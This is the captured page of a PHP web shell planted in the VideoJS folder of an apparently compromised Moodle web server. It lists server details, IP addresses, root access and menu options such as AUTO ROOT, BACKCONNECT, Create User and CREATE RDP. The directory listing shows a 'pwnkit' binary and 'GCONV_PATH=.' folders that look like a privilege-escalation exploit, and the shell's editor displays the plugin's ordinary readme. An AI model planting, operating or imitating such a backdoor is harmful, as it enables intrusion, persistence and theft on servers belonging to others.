Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
media /
player /
videojs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxrwxrwx
classes
[ DIR ]
drwxrwxrwx
fonts
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
videojs
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
1.92
KB
-rwxrwxrwx
settings.php
2.74
KB
-rwxrwxrwx
styles.css
45.91
KB
-rwxrwxrwx
thirdpartylibs.xml
1.2
KB
-rwxrwxrwx
version.php
1.12
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
VideoJS 7.7.6 ------------- https://github.com/videojs/video.js Instructions to import VideoJS player into Moodle: 1. Download the latest release from https://github.com/videojs/video.js/releases (do not choose "Source code") 2. copy 'video.js' into 'amd/src/video-lazy.js' In the beginning of the js file replace define(['global/window', 'global/document'] with define(['./window', './document'] 3. copy 'font/' into 'fonts/' folder 4. copy 'video-js.css' into 'styles.css' Add /* stylelint-disable */ in the beginning. Maintain the css after "/* Modifications of player made by Moodle: */" to the end of the styles file. Check status of: https://github.com/videojs/video.js/issues/2777 6. copy 'lang/' into 'videojs/' subfolder (so the result will be media/player/videojs/videojs/lang). Import plugins: 1. Copy https://github.com/videojs/videojs-youtube/blob/master/dist/Youtube.js into 'amd/src/Youtube-lazy.js' In the beginning of the js file replace define(['videojs'] with define(['media_videojs/video-lazy'] 2. Download the latest release from https://github.com/videojs/videojs-flash Run "npm install" Copy 'dist/videojs-flash.js' into 'amd/src/videojs-flash-lazy.js' In the beginning of the js file replace define(['videojs'] with define(['media_videojs/video-lazy'] 3. Download https://github.com/videojs/video-js-swf/blob/master/dist/video-js.swf and place it into 'videojs/video-js.swf' Changes: In order to improve the validation, a couple of minor changes have been added to the video-lazy.js: 1. Partial upgrade from VideoJS 7.17.0 for 'Subtitles' label check in 17824 - 17833 2. Partial upgrade from VideoJS 7.17.0 for 'Captions' label check from 18897 - 18911 3. Partial upgrade from VideoJS 7.17.0 for 'Description' label check from 19062 - 19075 4. Fixed the video controls not being displayed when playing a video 5. Fixed the menu item not being displayed as expected
Close